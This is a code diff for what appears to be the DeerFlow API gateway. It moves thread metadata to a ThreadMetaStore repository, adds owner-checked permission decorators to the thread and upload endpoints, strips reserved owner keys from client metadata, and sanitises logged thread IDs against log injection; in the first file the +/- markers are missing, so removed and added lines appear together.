from app.gateway.deps import get_checkpointer, get_store
from app.gateway.authz import require_permission
from app.gateway.deps import get_checkpointer
from app.gateway.utils import sanitize_log_param
from deerflow.config.paths import Paths, get_paths
from deerflow.runtime import serialize_channel_values

# ---------------------------------------------------------------------------
# Store namespace
# ---------------------------------------------------------------------------

THREADS_NS: tuple[str, ...] = ("threads",)
"""Namespace used by the Store for thread metadata records."""

logger = logging.getLogger(__name__)
router = APIRouter(prefix="/api/threads", tags=["threads"])


# Metadata keys that the server controls; clients are not allowed to set
# them. Pydantic ``@field_validator("metadata")`` strips them on every
# inbound model below so a malicious client cannot reflect a forged
# owner identity through the API surface. Defense-in-depth — the
# row-level invariant is still ``threads_meta.owner_id`` populated from
# the auth contextvar; this list closes the metadata-blob echo gap.
_SERVER_RESERVED_METADATA_KEYS: frozenset[str] = frozenset({"owner_id", "user_id"})


def _strip_reserved_metadata(metadata: dict[str, Any] | None) -> dict[str, Any]:
    """Return ``metadata`` with server-controlled keys removed."""
    if not metadata:
        return metadata or {}
    return {k: v for k, v in metadata.items() if k not in _SERVER_RESERVED_METADATA_KEYS}


# ---------------------------------------------------------------------------
# Response / request models
# ---------------------------------------------------------------------------

@@ -63,8 +74,11 @@ class ThreadCreateRequest(BaseModel):
    """Request body for creating a thread."""

    thread_id: str | None = Field(default=None, description="Optional thread ID (auto-generated if omitted)")
    assistant_id: str | None = Field(default=None, description="Associate thread with an assistant")
    metadata: dict[str, Any] = Field(default_factory=dict, description="Initial metadata")

    _strip_reserved = field_validator("metadata")(classmethod(lambda cls, v: _strip_reserved_metadata(v)))


class ThreadSearchRequest(BaseModel):
    """Request body for searching threads."""

@@ -93,6 +107,8 @@ class ThreadPatchRequest(BaseModel):

    metadata: dict[str, Any] = Field(default_factory=dict, description="Metadata to merge")

    _strip_reserved = field_validator("metadata")(classmethod(lambda cls, v: _strip_reserved_metadata(v)))


class ThreadStateUpdateRequest(BaseModel):
    """Request body for updating thread state (human-in-the-loop resume)."""

@@ -135,61 +151,16 @@ def _delete_thread_data(thread_id: str, paths: Paths | None = None) -> ThreadDel
        raise HTTPException(status_code=422, detail=str(exc)) from exc
    except FileNotFoundError:
        # Not critical — thread data may not exist on disk
        logger.debug("No local thread data to delete for %s", thread_id)
        logger.debug("No local thread data to delete for %s", sanitize_log_param(thread_id))
        return ThreadDeleteResponse(success=True, message=f"No local data for {thread_id}")
    except Exception as exc:
        logger.exception("Failed to delete thread data for %s", thread_id)
        logger.exception("Failed to delete thread data for %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to delete local thread data.") from exc

    logger.info("Deleted local thread data for %s", thread_id)
    logger.info("Deleted local thread data for %s", sanitize_log_param(thread_id))
    return ThreadDeleteResponse(success=True, message=f"Deleted local thread data for {thread_id}")


async def _store_get(store, thread_id: str) -> dict | None:
    """Fetch a thread record from the Store; returns ``None`` if absent."""
    item = await store.aget(THREADS_NS, thread_id)
    return item.value if item is not None else None


async def _store_put(store, record: dict) -> None:
    """Write a thread record to the Store."""
    await store.aput(THREADS_NS, record["thread_id"], record)


async def _store_upsert(store, thread_id: str, *, metadata: dict | None = None, values: dict | None = None) -> None:
    """Create or refresh a thread record in the Store.

    On creation the record is written with ``status="idle"``. On update only
    ``updated_at`` (and optionally ``metadata`` / ``values``) are changed so
    that existing fields are preserved.

    ``values`` carries the agent-state snapshot exposed to the frontend
    (currently just ``{"title": "..."}``).
    """
    now = time.time()
    existing = await _store_get(store, thread_id)
    if existing is None:
        await _store_put(
            store,
            {
                "thread_id": thread_id,
                "status": "idle",
                "created_at": now,
                "updated_at": now,
                "metadata": metadata or {},
                "values": values or {},
            },
        )
    else:
        val = dict(existing)
        val["updated_at"] = now
        if metadata:
            val.setdefault("metadata", {}).update(metadata)
        if values:
            val.setdefault("values", {}).update(values)
        await _store_put(store, val)


def _derive_thread_status(checkpoint_tuple) -> str:
    """Derive thread status from checkpoint metadata."""
    if checkpoint_tuple is None:

@@ -215,23 +186,19 @@ def _derive_thread_status(checkpoint_tuple) -> str:


@router.delete("/{thread_id}", response_model=ThreadDeleteResponse)
@require_permission("threads", "delete", owner_check=True, require_existing=True)
async def delete_thread_data(thread_id: str, request: Request) -> ThreadDeleteResponse:
    """Delete local persisted filesystem data for a thread.

    Cleans DeerFlow-managed thread directories, removes checkpoint data,
    and removes the thread record from the Store.
    and removes the thread_meta row from the configured ThreadMetaStore
    (sqlite or memory).
    """
    from app.gateway.deps import get_thread_meta_repo

    # Clean local filesystem
    response = _delete_thread_data(thread_id)

    # Remove from Store (best-effort)
    store = get_store(request)
    if store is not None:
        try:
            await store.adelete(THREADS_NS, thread_id)
        except Exception:
            logger.debug("Could not delete store record for thread %s (not critical)", thread_id)

    # Remove checkpoints (best-effort)
    checkpointer = getattr(request.app.state, "checkpointer", None)
    if checkpointer is not None:

@@ -239,7 +206,15 @@ async def delete_thread_data(thread_id: str, request: Request) -> ThreadDeleteRe
            if hasattr(checkpointer, "adelete_thread"):
                await checkpointer.adelete_thread(thread_id)
        except Exception:
            logger.debug("Could not delete checkpoints for thread %s (not critical)", thread_id)
            logger.debug("Could not delete checkpoints for thread %s (not critical)", sanitize_log_param(thread_id))

    # Remove thread_meta row (best-effort) — required for sqlite backend
    # so the deleted thread no longer appears in /threads/search.
    try:
        thread_meta_repo = get_thread_meta_repo(request)
        await thread_meta_repo.delete(thread_id)
    except Exception:
        logger.debug("Could not delete thread_meta for %s (not critical)", sanitize_log_param(thread_id))

    return response

@@ -248,43 +223,40 @@ async def delete_thread_data(thread_id: str, request: Request) -> ThreadDeleteRe
async def create_thread(body: ThreadCreateRequest, request: Request) -> ThreadResponse:
    """Create a new thread.

    The thread record is written to the Store (for fast listing) and an
    empty checkpoint is written to the checkpointer (for state reads).
    Writes a thread_meta record (so the thread appears in /threads/search)
    and an empty checkpoint (so state endpoints work immediately).
    Idempotent: returns the existing record when ``thread_id`` already exists.
    """
    store = get_store(request)
    from app.gateway.deps import get_thread_meta_repo

    checkpointer = get_checkpointer(request)
    thread_meta_repo = get_thread_meta_repo(request)
    thread_id = body.thread_id or str(uuid.uuid4())
    now = time.time()
    # ``body.metadata`` is already stripped of server-reserved keys by
    # ``ThreadCreateRequest._strip_reserved`` — see the model definition.

    # Idempotency: return existing record from Store when already present
    if store is not None:
        existing_record = await _store_get(store, thread_id)
        if existing_record is not None:
            return ThreadResponse(
                thread_id=thread_id,
                status=existing_record.get("status", "idle"),
                created_at=str(existing_record.get("created_at", "")),
                updated_at=str(existing_record.get("updated_at", "")),
                metadata=existing_record.get("metadata", {}),
            )
    # Idempotency: return existing record when already present
    existing_record = await thread_meta_repo.get(thread_id)
    if existing_record is not None:
        return ThreadResponse(
            thread_id=thread_id,
            status=existing_record.get("status", "idle"),
            created_at=str(existing_record.get("created_at", "")),
            updated_at=str(existing_record.get("updated_at", "")),
            metadata=existing_record.get("metadata", {}),
        )

    # Write thread record to Store
    if store is not None:
        try:
            await _store_put(
                store,
                {
                    "thread_id": thread_id,
                    "status": "idle",
                    "created_at": now,
                    "updated_at": now,
                    "metadata": body.metadata,
                },
            )
        except Exception:
            logger.exception("Failed to write thread %s to store", thread_id)
            raise HTTPException(status_code=500, detail="Failed to create thread")
    # Write thread_meta so the thread appears in /threads/search immediately
    try:
        await thread_meta_repo.create(
            thread_id,
            assistant_id=getattr(body, "assistant_id", None),
            metadata=body.metadata,
        )
    except Exception:
        logger.exception("Failed to write thread_meta for %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to create thread")

    # Write an empty checkpoint so state endpoints work immediately
    config = {"configurable": {"thread_id": thread_id, "checkpoint_ns": ""}}

@@ -301,10 +273,10 @@ async def create_thread(body: ThreadCreateRequest, request: Request) -> ThreadRe
        }
        await checkpointer.aput(config, empty_checkpoint(), ckpt_metadata, {})
    except Exception:
        logger.exception("Failed to create checkpoint for thread %s", thread_id)
        logger.exception("Failed to create checkpoint for thread %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to create thread")

    logger.info("Thread created: %s", thread_id)
    logger.info("Thread created: %s", sanitize_log_param(thread_id))
    return ThreadResponse(
        thread_id=thread_id,
        status="idle",

@@ -318,166 +290,91 @@ async def create_thread(body: ThreadCreateRequest, request: Request) -> ThreadRe
async def search_threads(body: ThreadSearchRequest, request: Request) -> list[ThreadResponse]:
    """Search and list threads.

    Two-phase approach:

    **Phase 1 — Store (fast path, O(threads))**: returns threads that were
    created or run through this Gateway. Store records are tiny metadata
    dicts so fetching all of them at once is cheap.

    **Phase 2 — Checkpointer supplement (lazy migration)**: threads that
    were created directly by LangGraph Server (and therefore absent from the
    Store) are discovered here by iterating the shared checkpointer. Any
    newly found thread is immediately written to the Store so that the next
    search skips Phase 2 for that thread — the Store converges to a full
    index over time without a one-shot migration job.
    Delegates to the configured ThreadMetaStore implementation
    (SQL-backed for sqlite/postgres, Store-backed for memory mode).
    """
    store = get_store(request)
    checkpointer = get_checkpointer(request)
    from app.gateway.deps import get_thread_meta_repo

    # -----------------------------------------------------------------------
    # Phase 1: Store
    # -----------------------------------------------------------------------
    merged: dict[str, ThreadResponse] = {}

    if store is not None:
        try:
            items = await store.asearch(THREADS_NS, limit=10_000)
        except Exception:
            logger.warning("Store search failed — falling back to checkpointer only", exc_info=True)
            items = []

        for item in items:
            val = item.value
            merged[val["thread_id"]] = ThreadResponse(
                thread_id=val["thread_id"],
                status=val.get("status", "idle"),
                created_at=str(val.get("created_at", "")),
                updated_at=str(val.get("updated_at", "")),
                metadata=val.get("metadata", {}),
                values=val.get("values", {}),
            )

    # -----------------------------------------------------------------------
    # Phase 2: Checkpointer supplement
    # Discovers threads not yet in the Store (e.g. created by LangGraph
    # Server) and lazily migrates them so future searches skip this phase.
    # -----------------------------------------------------------------------
    try:
        async for checkpoint_tuple in checkpointer.alist(None):
            cfg = getattr(checkpoint_tuple, "config", {})
            thread_id = cfg.get("configurable", {}).get("thread_id")
            if not thread_id or thread_id in merged:
                continue

            # Skip sub-graph checkpoints (checkpoint_ns is non-empty for those)
            if cfg.get("configurable", {}).get("checkpoint_ns", ""):
                continue

            ckpt_meta = getattr(checkpoint_tuple, "metadata", {}) or {}
            # Strip LangGraph internal keys from the user-visible metadata dict
            user_meta = {k: v for k, v in ckpt_meta.items() if k not in ("created_at", "updated_at", "step", "source", "writes", "parents")}

            # Extract state values (title) from the checkpoint's channel_values
            checkpoint_data = getattr(checkpoint_tuple, "checkpoint", {}) or {}
            channel_values = checkpoint_data.get("channel_values", {})
            ckpt_values = {}
            if title := channel_values.get("title"):
                ckpt_values["title"] = title

            thread_resp = ThreadResponse(
                thread_id=thread_id,
                status=_derive_thread_status(checkpoint_tuple),
                created_at=str(ckpt_meta.get("created_at", "")),
                updated_at=str(ckpt_meta.get("updated_at", ckpt_meta.get("created_at", ""))),
                metadata=user_meta,
                values=ckpt_values,
            )
            merged[thread_id] = thread_resp

            # Lazy migration — write to Store so the next search finds it there
            if store is not None:
                try:
                    await _store_upsert(store, thread_id, metadata=user_meta, values=ckpt_values or None)
                except Exception:
                    logger.debug("Failed to migrate thread %s to store (non-fatal)", thread_id)
    except Exception:
        logger.exception("Checkpointer scan failed during thread search")
        # Don't raise — return whatever was collected from Store + partial scan

    # -----------------------------------------------------------------------
    # Phase 3: Filter → sort → paginate
    # -----------------------------------------------------------------------
    results = list(merged.values())

    if body.metadata:
        results = [r for r in results if all(r.metadata.get(k) == v for k, v in body.metadata.items())]

    if body.status:
        results = [r for r in results if r.status == body.status]

    results.sort(key=lambda r: r.updated_at, reverse=True)
    return results[body.offset : body.offset + body.limit]
    repo = get_thread_meta_repo(request)
    rows = await repo.search(
        metadata=body.metadata or None,
        status=body.status,
        limit=body.limit,
        offset=body.offset,
    )
    return [
        ThreadResponse(
            thread_id=r["thread_id"],
            status=r.get("status", "idle"),
            created_at=r.get("created_at", ""),
            updated_at=r.get("updated_at", ""),
            metadata=r.get("metadata", {}),
            values={"title": r["display_name"]} if r.get("display_name") else {},
            interrupts={},
        )
        for r in rows
    ]


@router.patch("/{thread_id}", response_model=ThreadResponse)
@require_permission("threads", "write", owner_check=True, require_existing=True)
async def patch_thread(thread_id: str, body: ThreadPatchRequest, request: Request) -> ThreadResponse:
    """Merge metadata into a thread record."""
    store = get_store(request)
    if store is None:
        raise HTTPException(status_code=503, detail="Store not available")
    from app.gateway.deps import get_thread_meta_repo

    record = await _store_get(store, thread_id)
    thread_meta_repo = get_thread_meta_repo(request)
    record = await thread_meta_repo.get(thread_id)
    if record is None:
        raise HTTPException(status_code=404, detail=f"Thread {thread_id} not found")

    now = time.time()
    updated = dict(record)
    updated.setdefault("metadata", {}).update(body.metadata)
    updated["updated_at"] = now

    # ``body.metadata`` already stripped by ``ThreadPatchRequest._strip_reserved``.
    try:
        await _store_put(store, updated)
        await thread_meta_repo.update_metadata(thread_id, body.metadata)
    except Exception:
        logger.exception("Failed to patch thread %s", thread_id)
        logger.exception("Failed to patch thread %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to update thread")

    # Re-read to get the merged metadata + refreshed updated_at
    record = await thread_meta_repo.get(thread_id) or record
    return ThreadResponse(
        thread_id=thread_id,
        status=updated.get("status", "idle"),
        created_at=str(updated.get("created_at", "")),
        updated_at=str(now),
        metadata=updated.get("metadata", {}),
        status=record.get("status", "idle"),
        created_at=str(record.get("created_at", "")),
        updated_at=str(record.get("updated_at", "")),
        metadata=record.get("metadata", {}),
    )


@router.get("/{thread_id}", response_model=ThreadResponse)
@require_permission("threads", "read", owner_check=True)
async def get_thread(thread_id: str, request: Request) -> ThreadResponse:
    """Get thread info.

    Reads metadata from the Store and derives the accurate execution
    status from the checkpointer. Falls back to the checkpointer alone
    for threads that pre-date Store adoption (backward compat).
    Reads metadata from the ThreadMetaStore and derives the accurate
    execution status from the checkpointer. Falls back to the checkpointer
    alone for threads that pre-date ThreadMetaStore adoption (backward compat).
    """
    store = get_store(request)
    from app.gateway.deps import get_thread_meta_repo

    thread_meta_repo = get_thread_meta_repo(request)
    checkpointer = get_checkpointer(request)

    record: dict | None = None
    if store is not None:
        record = await _store_get(store, thread_id)
    record: dict | None = await thread_meta_repo.get(thread_id)

    # Derive accurate status from the checkpointer
    config = {"configurable": {"thread_id": thread_id, "checkpoint_ns": ""}}
    try:
        checkpoint_tuple = await checkpointer.aget_tuple(config)
    except Exception:
        logger.exception("Failed to get checkpoint for thread %s", thread_id)
        logger.exception("Failed to get checkpoint for thread %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to get thread")

    if record is None and checkpoint_tuple is None:
        raise HTTPException(status_code=404, detail=f"Thread {thread_id} not found")

    # If the thread exists in the checkpointer but not the store (e.g. legacy
    # data), synthesize a minimal store record from the checkpoint metadata.
    # If the thread exists in the checkpointer but not in thread_meta (e.g.
    # legacy data created before thread_meta adoption), synthesize a minimal
    # record from the checkpoint metadata.
    if record is None and checkpoint_tuple is not None:
        ckpt_meta = getattr(checkpoint_tuple, "metadata", {}) or {}
        record = {

@@ -506,6 +403,7 @@ async def get_thread(thread_id: str, request: Request) -> ThreadResponse:


@router.get("/{thread_id}/state", response_model=ThreadStateResponse)
@require_permission("threads", "read", owner_check=True)
async def get_thread_state(thread_id: str, request: Request) -> ThreadStateResponse:
    """Get the latest state snapshot for a thread.

@@ -518,7 +416,7 @@ async def get_thread_state(thread_id: str, request: Request) -> ThreadStateRespo
    try:
        checkpoint_tuple = await checkpointer.aget_tuple(config)
    except Exception:
        logger.exception("Failed to get state for thread %s", thread_id)
        logger.exception("Failed to get state for thread %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to get thread state")

    if checkpoint_tuple is None:

@@ -555,15 +453,19 @@ async def get_thread_state(thread_id: str, request: Request) -> ThreadStateRespo


@router.post("/{thread_id}/state", response_model=ThreadStateResponse)
@require_permission("threads", "write", owner_check=True, require_existing=True)
async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, request: Request) -> ThreadStateResponse:
    """Update thread state (e.g. for human-in-the-loop resume or title rename).

    Writes a new checkpoint that merges *body.values* into the latest
    channel values, then syncs any updated ``title`` field back to the Store
    so that ``/threads/search`` reflects the change immediately.
    channel values, then syncs any updated ``title`` field through the
    ThreadMetaStore abstraction so that ``/threads/search`` reflects the
    change immediately in both sqlite and memory backends.
    """
    from app.gateway.deps import get_thread_meta_repo

    checkpointer = get_checkpointer(request)
    store = get_store(request)
    thread_meta_repo = get_thread_meta_repo(request)

    # checkpoint_ns must be present in the config for aput — default to ""
    # (the root graph namespace). checkpoint_id is optional; omitting it

@@ -580,7 +482,7 @@ async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, re
    try:
        checkpoint_tuple = await checkpointer.aget_tuple(read_config)
    except Exception:
        logger.exception("Failed to get state for thread %s", thread_id)
        logger.exception("Failed to get state for thread %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to get thread state")

    if checkpoint_tuple is None:

@@ -614,19 +516,22 @@ async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, re
    try:
        new_config = await checkpointer.aput(write_config, checkpoint, metadata, {})
    except Exception:
        logger.exception("Failed to update state for thread %s", thread_id)
        logger.exception("Failed to update state for thread %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to update thread state")

    new_checkpoint_id: str | None = None
    if isinstance(new_config, dict):
        new_checkpoint_id = new_config.get("configurable", {}).get("checkpoint_id")

    # Sync title changes to the Store so /threads/search reflects them immediately.
    if store is not None and body.values and "title" in body.values:
        try:
            await _store_upsert(store, thread_id, values={"title": body.values["title"]})
        except Exception:
            logger.debug("Failed to sync title to store for thread %s (non-fatal)", thread_id)
    # Sync title changes through the ThreadMetaStore abstraction so /threads/search
    # reflects them immediately in both sqlite and memory backends.
    if body.values and "title" in body.values:
        new_title = body.values["title"]
        if new_title:  # Skip empty strings and None
            try:
                await thread_meta_repo.update_display_name(thread_id, new_title)
            except Exception:
                logger.debug("Failed to sync title to thread_meta for %s (non-fatal)", sanitize_log_param(thread_id))

    return ThreadStateResponse(
        values=serialize_channel_values(channel_values),

@@ -638,8 +543,16 @@ async def update_thread_state(thread_id: str, body: ThreadStateUpdateRequest, re


@router.post("/{thread_id}/history", response_model=list[HistoryEntry])
@require_permission("threads", "read", owner_check=True)
async def get_thread_history(thread_id: str, body: ThreadHistoryRequest, request: Request) -> list[HistoryEntry]:
    """Get checkpoint history for a thread."""
    """Get checkpoint history for a thread.

    Messages are read from the checkpointer's channel values (the
    authoritative source) and serialized via
    :func:`~deerflow.runtime.serialization.serialize_channel_values`.
    Only the latest (first) checkpoint carries the ``messages`` key to
    avoid duplicating them across every entry.
    """
    checkpointer = get_checkpointer(request)

    config: dict[str, Any] = {"configurable": {"thread_id": thread_id}}

@@ -647,6 +560,7 @@ async def get_thread_history(thread_id: str, body: ThreadHistoryRequest, request
        config["configurable"]["checkpoint_id"] = body.before

    entries: list[HistoryEntry] = []
    is_latest_checkpoint = True
    try:
        async for checkpoint_tuple in checkpointer.alist(config, limit=body.limit):
            ckpt_config = getattr(checkpoint_tuple, "config", {})

@@ -661,22 +575,42 @@ async def get_thread_history(thread_id: str, body: ThreadHistoryRequest, request

            channel_values = checkpoint.get("channel_values", {})

            # Build values from checkpoint channel_values
            values: dict[str, Any] = {}
            if title := channel_values.get("title"):
                values["title"] = title
            if thread_data := channel_values.get("thread_data"):
                values["thread_data"] = thread_data

            # Attach messages from checkpointer only for the latest checkpoint
            if is_latest_checkpoint:
                messages = channel_values.get("messages")
                if messages:
                    values["messages"] = serialize_channel_values({"messages": messages}).get("messages", [])
                is_latest_checkpoint = False

            # Derive next tasks
            tasks_raw = getattr(checkpoint_tuple, "tasks", []) or []
            next_tasks = [t.name for t in tasks_raw if hasattr(t, "name")]

            # Strip LangGraph internal keys from metadata
            user_meta = {k: v for k, v in metadata.items() if k not in ("created_at", "updated_at", "step", "source", "writes", "parents")}
            # Keep step for ordering context
            if "step" in metadata:
                user_meta["step"] = metadata["step"]

            entries.append(
                HistoryEntry(
                    checkpoint_id=checkpoint_id,
                    parent_checkpoint_id=parent_id,
                    metadata=metadata,
                    values=serialize_channel_values(channel_values),
                    metadata=user_meta,
                    values=values,
                    created_at=str(metadata.get("created_at", "")),
                    next=next_tasks,
                )
            )
    except Exception:
        logger.exception("Failed to get history for thread %s", thread_id)
        logger.exception("Failed to get history for thread %s", sanitize_log_param(thread_id))
        raise HTTPException(status_code=500, detail="Failed to get thread history")

    return entries

@@ -4,9 +4,10 @@ import logging
|
||||
import os
|
||||
import stat
|
||||
|
||||
from fastapi import APIRouter, File, HTTPException, UploadFile
|
||||
from fastapi import APIRouter, File, HTTPException, Request, UploadFile
|
||||
from pydantic import BaseModel
|
||||
|
||||
from app.gateway.authz import require_permission
|
||||
from deerflow.config.paths import get_paths
|
||||
from deerflow.sandbox.sandbox_provider import get_sandbox_provider
|
||||
from deerflow.uploads.manager import (
|
||||
@@ -54,8 +55,10 @@ def _make_file_sandbox_writable(file_path: os.PathLike[str] | str) -> None:
|
||||
|
||||
|
||||
@router.post("", response_model=UploadResponse)
|
||||
@require_permission("threads", "write", owner_check=True, require_existing=True)
|
||||
async def upload_files(
|
||||
thread_id: str,
|
||||
request: Request,
|
||||
files: list[UploadFile] = File(...),
|
||||
) -> UploadResponse:
|
||||
"""Upload multiple files to a thread's uploads directory."""
|
||||
@@ -133,7 +136,8 @@ async def upload_files(
|
||||
|
||||
|
||||
@router.get("/list", response_model=dict)
|
||||
async def list_uploaded_files(thread_id: str) -> dict:
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def list_uploaded_files(thread_id: str, request: Request) -> dict:
|
||||
"""List all files in a thread's uploads directory."""
|
||||
try:
|
||||
uploads_dir = get_uploads_dir(thread_id)
|
||||
@@ -151,7 +155,8 @@ async def list_uploaded_files(thread_id: str) -> dict:
|
||||
|
||||
|
||||
@router.delete("/{filename}")
|
||||
async def delete_uploaded_file(thread_id: str, filename: str) -> dict:
|
||||
@require_permission("threads", "delete", owner_check=True, require_existing=True)
|
||||
async def delete_uploaded_file(thread_id: str, filename: str, request: Request) -> dict:
|
||||
"""Delete a file from a thread's uploads directory."""
|
||||
try:
|
||||
uploads_dir = get_uploads_dir(thread_id)
|
||||
|
||||
@@ -8,16 +8,17 @@ frames, and consuming stream bridge events. Router modules
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import dataclasses
|
||||
import json
|
||||
import logging
|
||||
import re
|
||||
import time
|
||||
from typing import Any
|
||||
|
||||
from fastapi import HTTPException, Request
|
||||
from langchain_core.messages import HumanMessage
|
||||
|
||||
from app.gateway.deps import get_checkpointer, get_run_manager, get_store, get_stream_bridge
|
||||
from app.gateway.deps import get_run_context, get_run_manager, get_run_store, get_stream_bridge
|
||||
from app.gateway.utils import sanitize_log_param
|
||||
from deerflow.runtime import (
|
||||
END_SENTINEL,
|
||||
HEARTBEAT_SENTINEL,
|
||||
@@ -171,71 +172,6 @@ def build_run_config(
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
async def _upsert_thread_in_store(store, thread_id: str, metadata: dict | None) -> None:
|
||||
"""Create or refresh the thread record in the Store.
|
||||
|
||||
Called from :func:`start_run` so that threads created via the stateless
|
||||
``/runs/stream`` endpoint (which never calls ``POST /threads``) still
|
||||
appear in ``/threads/search`` results.
|
||||
"""
|
||||
# Deferred import to avoid circular import with the threads router module.
|
||||
from app.gateway.routers.threads import _store_upsert
|
||||
|
||||
try:
|
||||
await _store_upsert(store, thread_id, metadata=metadata)
|
||||
except Exception:
|
||||
logger.warning("Failed to upsert thread %s in store (non-fatal)", thread_id)
|
||||
|
||||
|
||||
async def _sync_thread_title_after_run(
|
||||
run_task: asyncio.Task,
|
||||
thread_id: str,
|
||||
checkpointer: Any,
|
||||
store: Any,
|
||||
) -> None:
|
||||
"""Wait for *run_task* to finish, then persist the generated title to the Store.
|
||||
|
||||
TitleMiddleware writes the generated title to the LangGraph agent state
|
||||
(checkpointer) but the Gateway's Store record is not updated automatically.
|
||||
This coroutine closes that gap by reading the final checkpoint after the
|
||||
run completes and syncing ``values.title`` into the Store record so that
|
||||
subsequent ``/threads/search`` responses include the correct title.
|
||||
|
||||
Runs as a fire-and-forget :func:`asyncio.create_task`; failures are
|
||||
logged at DEBUG level and never propagate.
|
||||
"""
|
||||
# Wait for the background run task to complete (any outcome).
|
||||
# asyncio.wait does not propagate task exceptions — it just returns
|
||||
# when the task is done, cancelled, or failed.
|
||||
await asyncio.wait({run_task})
|
||||
|
||||
# Deferred import to avoid circular import with the threads router module.
|
||||
from app.gateway.routers.threads import _store_get, _store_put
|
||||
|
||||
try:
|
||||
ckpt_config = {"configurable": {"thread_id": thread_id, "checkpoint_ns": ""}}
|
||||
ckpt_tuple = await checkpointer.aget_tuple(ckpt_config)
|
||||
if ckpt_tuple is None:
|
||||
return
|
||||
|
||||
channel_values = ckpt_tuple.checkpoint.get("channel_values", {})
|
||||
title = channel_values.get("title")
|
||||
if not title:
|
||||
return
|
||||
|
||||
existing = await _store_get(store, thread_id)
|
||||
if existing is None:
|
||||
return
|
||||
|
||||
updated = dict(existing)
|
||||
updated.setdefault("values", {})["title"] = title
|
||||
updated["updated_at"] = time.time()
|
||||
await _store_put(store, updated)
|
||||
logger.debug("Synced title %r for thread %s", title, thread_id)
|
||||
except Exception:
|
||||
logger.debug("Failed to sync title for thread %s (non-fatal)", thread_id, exc_info=True)
|
||||
|
||||
|
||||
async def start_run(
|
||||
body: Any,
|
||||
thread_id: str,
|
||||
@@ -255,11 +191,25 @@ async def start_run(
|
||||
"""
|
||||
bridge = get_stream_bridge(request)
|
||||
run_mgr = get_run_manager(request)
|
||||
checkpointer = get_checkpointer(request)
|
||||
store = get_store(request)
|
||||
run_ctx = get_run_context(request)
|
||||
|
||||
disconnect = DisconnectMode.cancel if body.on_disconnect == "cancel" else DisconnectMode.continue_
|
||||
|
||||
# Resolve follow_up_to_run_id: explicit from request, or auto-detect from latest successful run
|
||||
follow_up_to_run_id = getattr(body, "follow_up_to_run_id", None)
|
||||
if follow_up_to_run_id is None:
|
||||
run_store = get_run_store(request)
|
||||
try:
|
||||
recent_runs = await run_store.list_by_thread(thread_id, limit=1)
|
||||
if recent_runs and recent_runs[0].get("status") == "success":
|
||||
follow_up_to_run_id = recent_runs[0]["run_id"]
|
||||
except Exception:
|
||||
pass # Don't block run creation
|
||||
|
||||
# Enrich base context with per-run field
|
||||
if follow_up_to_run_id:
|
||||
run_ctx = dataclasses.replace(run_ctx, follow_up_to_run_id=follow_up_to_run_id)
|
||||
|
||||
try:
|
||||
record = await run_mgr.create_or_reject(
|
||||
thread_id,
|
||||
@@ -268,17 +218,28 @@ async def start_run(
|
||||
metadata=body.metadata or {},
|
||||
kwargs={"input": body.input, "config": body.config},
|
||||
multitask_strategy=body.multitask_strategy,
|
||||
follow_up_to_run_id=follow_up_to_run_id,
|
||||
)
|
||||
except ConflictError as exc:
|
||||
raise HTTPException(status_code=409, detail=str(exc)) from exc
|
||||
except UnsupportedStrategyError as exc:
|
||||
raise HTTPException(status_code=501, detail=str(exc)) from exc
|
||||
|
||||
# Ensure the thread is visible in /threads/search, even for threads that
|
||||
# were never explicitly created via POST /threads (e.g. stateless runs).
|
||||
store = get_store(request)
|
||||
if store is not None:
|
||||
await _upsert_thread_in_store(store, thread_id, body.metadata)
|
||||
# Upsert thread metadata so the thread appears in /threads/search,
|
||||
# even for threads that were never explicitly created via POST /threads
|
||||
# (e.g. stateless runs).
|
||||
try:
|
||||
existing = await run_ctx.thread_meta_repo.get(thread_id)
|
||||
if existing is None:
|
||||
await run_ctx.thread_meta_repo.create(
|
||||
thread_id,
|
||||
assistant_id=body.assistant_id,
|
||||
metadata=body.metadata,
|
||||
)
|
||||
else:
|
||||
await run_ctx.thread_meta_repo.update_status(thread_id, "running")
|
||||
except Exception:
|
||||
logger.warning("Failed to upsert thread_meta for %s (non-fatal)", sanitize_log_param(thread_id))
|
||||
|
||||
agent_factory = resolve_agent_factory(body.assistant_id)
|
||||
graph_input = normalize_input(body.input)
|
||||
@@ -311,8 +272,7 @@ async def start_run(
|
||||
bridge,
|
||||
run_mgr,
|
||||
record,
|
||||
checkpointer=checkpointer,
|
||||
store=store,
|
||||
ctx=run_ctx,
|
||||
agent_factory=agent_factory,
|
||||
graph_input=graph_input,
|
||||
config=config,
|
||||
@@ -324,11 +284,9 @@ async def start_run(
|
||||
)
|
||||
record.task = task
|
||||
|
||||
# After the run completes, sync the title generated by TitleMiddleware from
|
||||
# the checkpointer into the Store record so that /threads/search returns the
|
||||
# correct title instead of an empty values dict.
|
||||
if store is not None:
|
||||
asyncio.create_task(_sync_thread_title_after_run(task, thread_id, checkpointer, store))
|
||||
# Title sync is handled by worker.py's finally block which reads the
|
||||
# title from the checkpoint and calls thread_meta_repo.update_display_name
|
||||
# after the run completes.
|
||||
|
||||
return record
|
||||
|
||||
|
||||
@@ -0,0 +1,6 @@
|
||||
"""Shared utility helpers for the Gateway layer."""
|
||||
|
||||
|
||||
def sanitize_log_param(value: str) -> str:
|
||||
"""Strip control characters to prevent log injection."""
|
||||
return value.replace("\n", "").replace("\r", "").replace("\x00", "")
|
||||
@@ -86,6 +86,7 @@ Content-Type: application/json
|
||||
]
|
||||
},
|
||||
"config": {
|
||||
"recursion_limit": 100,
|
||||
"configurable": {
|
||||
"model_name": "gpt-4",
|
||||
"thinking_enabled": false,
|
||||
@@ -100,6 +101,21 @@ Content-Type: application/json
|
||||
- Use: `values`, `messages-tuple`, `custom`, `updates`, `events`, `debug`, `tasks`, `checkpoints`
|
||||
